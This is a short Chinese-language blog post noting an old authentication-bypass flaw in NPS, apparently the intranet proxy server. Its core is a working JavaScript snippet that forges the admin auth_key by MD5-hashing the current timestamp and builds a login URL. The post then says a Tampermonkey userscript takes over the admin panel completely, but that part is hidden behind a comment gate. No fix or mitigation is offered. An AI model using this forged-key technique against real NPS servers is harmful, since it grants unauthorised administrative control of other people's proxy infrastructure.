NPS 漏洞在好久以前就爆出來了。不過我最近才看到,所以記錄一下。
漏洞說明
JS 偽造鑒權認證
引用庫:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
const timestampSec = Math.floor(Date.now() / 1000).toString();
const auth_key = CryptoJS.MD5(CryptoJS.enc.Utf8.parse(timestampSec)).toString(CryptoJS.enc.Hex);
document.body.textContent = "index/index?auth_key=" + auth_key + "&" + "timestamp=" + timestampSec;通過油猴腳本完整接管後台
內容已隱藏,需要評論並且審核通過後,才能閱讀隱藏內容
版權屬於:zgcwkj
本文鏈接:https://www.zgcwkj.com/archives/253.html
轉載聲明:請注明本文章的標題及內容的出處和聲明,謝謝
評論已關閉